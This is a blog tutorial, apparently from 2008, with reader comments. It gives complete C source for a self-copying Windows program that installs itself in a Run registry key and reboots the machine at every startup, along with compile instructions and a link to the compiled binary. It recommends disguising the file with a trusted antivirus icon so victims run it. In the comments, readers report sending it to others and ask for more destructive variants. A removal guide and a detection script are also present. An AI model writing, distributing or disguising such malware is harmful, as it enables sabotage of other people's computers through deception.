
Creating a Virus to restart the Computer at every Startup

Submitted by Srikanth on Friday, 17 October 2008

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus needs to be double-clicked only once, and from then onwards it will carry out the rest of the operations. And one more thing: no antivirus software detects this as a virus. I have coded this virus in C, so if you are familiar with the C language, it is easy to understand the logic behind the code.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h>

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Compiling The Source Code Into Executable Virus.

1. Download the source code here
2. The downloaded file will be Sysres.C
3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)
4. The resulting .exe file is a virus, and once you execute it, it will infect the system.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From now on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in SAFE MODE.
2. Go to X:\Windows\System (X can be C, D, E or F).
3. You will find a file by the name sysres.exe; delete it.
4. Type regedit in Run. You will go to the registry editor. Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

There, on the right side, you will see an entry by the name “sres”. Delete this entry. That’s it. You have removed this virus successfully.
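The manual check in steps 2 to 4, as an added example (not code from the original post): it parses the text printed by `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"` and flags the two indicators this post names, the value name sres and a sysres.exe path under X:\Windows\System. The sample output is constructed and the function names are hypothetical; the matcher tolerates a stray space after a backslash, as appears in the listing above.

```python
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

# One value line of `reg query` output: 4-space indent, name, type, data.
VALUE_LINE = re.compile(
    r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$")

# Indicator from the post: sysres.exe in X:\Windows\System, X = C..F.
DROP_PATH = re.compile(r"^[c-f]:\\windows\\system\\sysres\.exe(?:\s|$)")


def parse_run_values(reg_output):
    """Return {value name: data} for every value line in the output."""
    values = {}
    for line in reg_output.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group("name")] = m.group("data").strip()
    return values


def normalise(data):
    """Lower-case, drop quotes, close up whitespace around backslashes."""
    data = data.replace('"', "").strip().lower()
    return re.sub(r"\s*\\\s*", r"\\", data)


def triage(reg_output):
    """Return (name, data, reasons) for entries matching the indicators."""
    findings = []
    for name, data in parse_run_values(reg_output).items():
        reasons = []
        if name.lower() == "sres":
            reasons.append("value name 'sres'")
        if DROP_PATH.match(normalise(data)):
            reasons.append("points at sysres.exe in Windows\\System")
        if reasons:
            findings.append((name, data, reasons))
    return findings


# Constructed sample of `reg query` output (not captured from a real host).
SAMPLE = "\n".join([
    "",
    RUN_KEY,
    r'    OneDrive    REG_SZ    "C:\Users\alice\OneDrive.exe" /background',
    r"    sres    REG_SZ    C:\windows\system\sysres.exe",
    r"    Updater Helper    REG_SZ    D:\WINDOWS\System\ sysres.exe",
    "",
])

if __name__ == "__main__":
    for name, data, reasons in triage(SAMPLE):
        print(f"{name!r} -> {data!r}: " + "; ".join(reasons))
```

A renamed value that still points at the dropped file is caught by the path check alone, which is why the two indicators are tested independently.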

Logic Behind The Working Of The Virus

If I don’t explain the logic (algorithm) behind the working of the virus, this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts, please pass comments.

LOGIC:
1. First the virus will find the root partition (the partition on which Windows is installed).
2. Next it will determine whether the virus file is already copied (already infected) into X:\Windows\System.
3. If not, it will just place a copy of itself into X:\Windows\System and make a registry entry to put this virus file onto the startup.
4. Or else, if the virus is already found in the X:\Windows\System directory (folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double-click the Sysres.exe file. The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file believe that it is Norton antivirus. Or you can change its ICON into the ICON of any popular and trusted program so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File.


43 Comments »

  • Poppernut said:

    I am having trouble with the compiler. is it possible for me to download the exe file with having to do the compiling?

  • Srikanth (author) said:

    @ poppernut

    I have used Borland C++ 32 bit compiler.

    Here is the download link and help on how to install and configure the compiler.

    http://dn.codegear.com/article/20633

  • Poppernut said:

    The borland compiler is acting weird and it is impossible for me to accomplish anything. I tried Dev-C++ Compiler. Everything works except one thing. The line

    struct ffblk ffblk;//File block structure
    it says “Aggregate ffblk ffblk has incomplete type and cannot be defined”

    Any Idea?

    I know I asked this last time, but can I download the exe file alone?

  • Srikanth (author) said:

    @ poppernut

    replace the line

    struct ffblk ffblk

    with the following line and try

    struct ffblk {
    char ff_reserved[21];
    char ff_attrib;
    int ff_ftime;
    int ff_fdate;
    long ff_fsize;
    char ff_name[13];
    }ffblk;

  • Poppernut said:

    Lines:

    done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC);

    done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

    done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0);

    done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

    done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

    else

    {
    system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
    \\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\sysres.exe");

    }
    And all of the

    if(done==0)

    lines have errors.

    It is possible that it has to do with the compiler I am using, for it does not use command lines. I can't use the borland one though. It keeps messing up.

    This project must be done by Friday for me. I have a schedule to stick to. I can look for something else meanwhile. Sorry to be complaining this much. Is it possible for me to download the exe version of the file, after it has been compiled? That would make this much easier. Thank you for helping me with this matter.

  • Poppernut said:

    I tried the borland compiler again. This time, when I try to open the bcc32, it flashes. Is there another file I should be opening?

  • Srikanth (author) said:

    @ poppernut

    You can use Borland c++ 3.0 (16-bit compiler) also.

    C++ 5.5 can only be used via commandline. You have to access Bbcc32 via commandline.

    The syntax for compiling is Bbcc32 filename.c

    The compiled exe file will be in the same directory as of bcc32.exe.

    Anyways leave it if you find some difficulty. I’ll send the compiled project itself.

    The download link is

    http://rapidshare.com/files/158582448/Sysres.rar

  • Poppernut said:

    It worked. Thank you very much. I appreciate it. I also love your site. (If I understand correctly, you're the host) The most useful of all is the “How to block websites.” Thanks :)

  • Srikanth (author) said:

    Thanks for your kind support…

  • Anonymous said:

    thanks for your valuable assist.

    Good Luck

  • Uriel said:

    Srikanth, thanks for sharing your knowledge in programming with us we appreciate it and good luck with the site! By the way, is it possible for me to change the file size of the exe file? i want it to look like a legit program or maybe you could teach me how to inject it into a legit file so that in the installation it would run with the legit program. thank you.

  • Srikanth (author) said:

    @ uriel,

    This is a bit difficult task. For that I should write a new post with all details.

    But you can definitely change the icon of the .exe file to resemble any legit program which I have already discussed!

  • Uriel said:

    @ srikanth,

    Thanks for that and I did change the icon to camouflage it just as you discussed in your post, I appreciate your work a lot, I just tried it and wow it scared me alright, now I’ve got some questions. When the virus ran it shows the cmd window “C://Windows/System/sysres.exe” If the person I sent this to (don’t worry he’s a bad guy) acted fast enough within the 60 seconds time limit and deleted the sysres.exe file in the system folder (not in safe mode) but he did not delete the registry entry, will this virus still work? And one more thing if I used notepad (save the source code as .exe) to create the exe file instead of C++ will it work? I’m sorry for the numerous questions but I really want to learn. Thanks!!!

  • Srikanth (author) said:

    @ uriel

    If it is deleted once it doesn’t work (even though the entry exists in the registry).

    But it is not possible to create a .exe file using a notepad. You should use C++ compiler only.

  • Anonymous said:

    Sir, suppose I have an exe file in my pendrive. Now my question is, is it possible that whenever I connect my pendrive the exe file should automatically get executed? If yes, please help me out. Sir, give me the step by step procedure.

  • C J Chua said:

    Hi Srikanth; I think my niece’s computer got infected with your virus, I tried to get into safe mode in order to delete sysres.exe and remove sres via regedit but it restarted every time on selecting safe mode, please advise, thanks.

  • Srikanth (author) said:

    @ C J Chua

    If your system is restarting even in the safe mode, then it’s definitely not because of my virus. The virus becomes active only when the system is booted normally and not during the safe mode. So, please check your system for other faults!

  • il-muxu said:

    I downloaded the virus file you posted and tested it but the computer didn’t restart automatically! What do you think is the problem?

  • Srikanth (author) said:

    @ il-muxu

    It’ll restart from the next boot. That is, the infection will come into effect from the next boot.

  • il-muxu said:

    Yes, I did manually reboot the system after I pressed sysres but when it turned on again it stayed on, it didn’t restart. Please help.
    Thanks for the quick response.

  • yuvaraj said:

    “THB” virus has affected my PC, how can I remove it? Please help me sir.

  • Srikanth (author) said:

    @ yuvaraj

    Install a good antivirus/antispyware and update it so that the updates are up to date. Then perform a full system scan to remove the virus. Recommended antiviruses are

    Kaspersky
    Norton
    Bitdefender

  • Mobin said:

    nice work man, really cool virus!!

    i wanted to know if there’s a virus, written in C, which can delete certain files so that the computer never boots again??

  • 27 said:

    Not bad, but why don’t you use getenv("WINDIR") to find the root partition? It would clean up your code, make it more readable, and increase its speed.

  • Srikanth (author) said:

    @ Mobin

    Yah, it’s possible to write such a virus… I’ll show how to write such a virus in my coming posts…

  • VISHAL said:

    hi, Shrikant Myself vishal rathore
    you have programmed many viruses.i want to know ,
    Have u programmed any antivirus?

  • Srikanth (author) said:

    @ Vishal

    Only virus programming till now. AV programming requires much greater skills.

  • jody said:

    Thanks for yer time and effort. nice page

  • Zals said:

    Hey Srikanth,i Appreciate ur knowledge and great works..and another thing i like in you is ur gud heart to share ur knowledge with us :)
    keep it up dude…nice website :)

  • Srikanth (author) said:

    @ Zals

    Thank you for your kind support. It keeps me motivated!! :)

  • VISHAL said:

    Thanks for your reply…………..
    please give me your email id if you have no prob….
    bcoz i want to discuss some problem of my project with you.

  • Srikanth (author) said:

    @ Vishal

    Just send ur problem through the contact form on this site. Later I’ll reply from my ID…

  • vishal said:

    i want to know where are you.
    i want to know i am doing a project on virus and antivirus.
    this is my M.Tech. degree project.
    so how can i start my project.
    what is the basic thing that can help me in understanding virus and antivirus programming………………

  • vishal said:

    thanks for ur reply.
    i want to become your friend…………………

  • Srikanth (author) said:

    @ Vishal

    My email is admin@gohacking.com….

    You can contact me through this ID…

  • raf said:

    hi srikanth i went through your page, nice. i wanted to know can i find and delete thb virus without an antivirus .

  • jets said:

    can i just download the virus and use it?
    i dont understand the codes

  • Srikanth (author) said:

    @ jets

    Yes you can download & use it without any problem. After testing it please follow the above mentioned info to remove it.

  • jets said:

    by remove u meant the steps about safe booting then go to windows drive and delete then edit registry for it right?
    what if i test this on another old computer and what do i do with this file, like the one i compiled and never opened? can i put it in recycle bin?
    thanks

  • naggappan said:

    I have compiled this pgm in the borland c++ (32-bit)compiler every thing works properly. But the only thing is it is not locking in the registry start up programs automatically when the exe file is clicked. but if i add it manually in the registry it works properly.

    is any wrong in the line ,

    system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
    CurrentVersion\\Run \/v sres \/t REG_SZ \/d
    C:\\windows\\system\\ sysres.exe”);

    or do i have problem only in my compiler..

  • Srikanth (author) said:

    @ naggappan

    Are u using an antivirus with proactive defense?

    May I know which antivirus r u using?

    Compile the source by downloading it.Do not copy-paste the program…

  • Slim0123 said:

    Nice work Srikanth, but if you would use something like windows.h in the header file and will attach the exe with some ecard(flash exe files) then I think it would not even create any suspicion in the user’s mind, so better mask your programs before sending them to anyone else

    and one more problem is that, these dos based programs are not intended to work on different platforms(if you compile in 64bit machine, it will not work on 32bit and vice versa) so better if you could resolve this problem too(i m a newbie so better you let me know if I m wrong instead of just letting go the post)

  • Srikanth (author) said:

    @ Slimright

    The program that I have written is just a simple virus that can be coded in C.

    For advanced viruses we have to make use of TSR concept.
